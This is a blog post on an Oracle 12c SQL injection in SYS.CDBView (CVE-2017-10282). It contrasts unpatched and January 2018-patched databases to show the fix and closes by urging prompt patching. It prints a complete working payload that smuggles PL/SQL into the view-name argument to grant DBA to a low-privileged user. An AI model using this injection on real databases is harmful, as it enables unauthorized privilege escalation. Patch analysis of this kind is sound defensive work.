This post is also available in: English
Since last quarter of 2016, a very easy to explore SQL Injection came to public where having a combination CREATE SESSION + EXECUTE_CATALOG_ROLE, an user could escalate his privileges to DBA. The first time I've read about this leak was on Mahmoud Hatem blog.
This SQL Injection affects 12.1.0.2 and 12.2.0.1 when the user has this privileges on CDB$ROOT or if it is a non-CDB.
After investigating all the code changes performed by 180116 CPU on BPs, PSUs, RU and RURs (for all changes click on the link), I could notice that oracle created a subfunction called isLegalOwnerViewName in CDBView to do something similar to DBMS_ASSERT:
Checking the list of all CVUs corrected by this updates, we can then infer that this bug is the CVE-2017-10282 created only on 21/June/2017.
Let's try to apply the injection in a 12.2 version with 171017 RU and 180116 RU, comparing the results:
On 12.2.0.1 with RU 171017 applied:
WARNING: In this Example the view ALL_CUBES will be replaced.
[oracle@localhost ~]$ opatch lspatches 26710464;Database Release Update : 12.2.0.1.171017 (26710464) OPatch succeeded. [oracle@localhost ~]$ sqlplus / as sysdba SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:10:29 2018 Copyright (c) 1982, 2016, Oracle. All rights reserved. Connected to: Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production SQL> create user c##dbarj identified by oracle; User created. SQL> grant create session to c##dbarj; Grant succeeded. SQL> grant execute_catalog_role to c##dbarj; Grant succeeded. SQL> conn c##dbarj/oracle Connected. SQL> select granted_role from user_role_privs; GRANTED_ROLE -------------------------------------------------------------------------------- EXECUTE_CATALOG_ROLE SQL> -- DON'T RUN IN PRODUCTION -- SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END; * ERROR at line 1: ORA-00905: missing keyword ORA-06512: at "SYS.CDBVIEW", line 56 ORA-06512: at line 1 SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES; X -------------------------------------------------------------------------------- 1 SQL> select granted_role from user_role_privs; GRANTED_ROLE -------------------------------------------------------------------------------- DBA EXECUTE_CATALOG_ROLE SQL>
The SQL Injection did work.
And now on 12.2.0.1 with RU 180116 applied:
[oracle@localhost ~]$ opatch lspatches 27105253;Database Release Update : 12.2.0.1.180116 (27105253) OPatch succeeded. [oracle@localhost ~]$ sqlplus / as sysdba SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:20:46 2018 Copyright (c) 1982, 2016, Oracle. All rights reserved. Connected to: Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production SQL> create user c##dbarj identified by oracle; User created. SQL> grant create session to c##dbarj; Grant succeeded. SQL> grant execute_catalog_role to c##dbarj; Grant succeeded. SQL> conn c##dbarj/oracle Connected. SQL> select granted_role from user_role_privs; GRANTED_ROLE -------------------------------------------------------------------------------- EXECUTE_CATALOG_ROLE SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END; * ERROR at line 1: ORA-00942: table or view does not exist ORA-06512: at "SYS.CDBVIEW", line 39 ORA-06512: at line 1 SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES; no rows selected SQL> select granted_role from user_role_privs; GRANTED_ROLE -------------------------------------------------------------------------------- EXECUTE_CATALOG_ROLE SQL>
SQL Injection didn't work anymore.
This is yet another reason to stay always in the latest SPU/PSU/BP/RU/RUR or whatever security fix you apply.
References:
- https://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
- https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixDB
Have you enjoyed? Please leave a comment or give a 👍!